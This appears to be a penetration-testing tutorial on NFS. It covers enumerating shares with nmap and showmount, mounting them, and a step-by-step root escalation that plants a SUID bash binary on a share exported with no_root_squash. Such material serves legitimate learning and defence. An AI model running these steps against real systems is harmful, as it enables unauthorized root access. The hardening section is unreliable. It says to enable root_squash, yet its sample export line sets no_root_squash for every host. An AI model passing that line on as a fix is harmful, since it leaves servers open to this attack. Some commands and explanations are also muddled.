Unterstand, Enumerate and Exploit NFS

NFS (Network File System) enables a server to share portions of its file system with clients over a network. Users and applications can interact with these remote files as if they were local. This functionality is achieved by mounting a remote directory onto a local directory on the client system. Access permissions to these files are controlled at the server level, based on user and group credentials.

How does NFS work?

Mounting:
A client system requests to mount a directory from the NFS server. The request is handled by the mount daemon via RPC.

File Handle Assignment:
The server validates the request and provides a unique file handle, which serves as a reference for accessing specific files and directories.

Access Control:
When a client attempts to access a file, the NFS daemon checks parameters like the file handle, user ID (UID), and group ID (GID). These determine the client’s access permissions, such as read or write access.

Enumerating NFS Shares

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <target-ip>

showmount -e <target-ip>

Mounting a NFS share:

mkdir /tmp/mount

sudo mount -t nfs <target-ip>:<share> /tmp/mount/ -nolock

Exploiting NFS

One common misconfiguration is disabling root_squash, which assigns root users from client systems the minimal privilege user nfsnobody on the server. Without root_squash, clients can upload files with SUID bits set, enabling privilege escalation. Files with the SUID bit execute with the privileges of their owner. For NFS exploitation, this means uploading a SUID-enabled binary to escalate privileges to root:

1. NFS Access
2. Gain Low Privilege Shell
3. Upload Bash executable to the NFS share
4. Set SUID permissions through NFS due to misconfigured root squash
5. Login, e.g. through SSH
6. Execute SUID bit bash executable
7. Get root access

1. Identify the NFS share:

showmount -e <target-ip>

2. Gain low-privilege shell access on the target.

3. Upload a SUID Bash executable:

scp -i key_name username@<target-ip>:/bin/bash ~/Downloads/bash

4. Mount the NFS share locally and upload the executable. Then, set its permissions:

chmod +s /path/to/uploaded/bash

5. Run the uploaded bash binary to gain a root shell:

./bash -p

Securing NFS configurations

Enable root_squash:
Prevent remote root access by ensuring root_squash is enabled:

/etc/exported/share *(rw,sync,no_root_squash)

Restrict Access:
Limit NFS share access to specific IPs and subnets.

Use Strong Authentication:
Implement Kerberos or similar authentication mechanisms.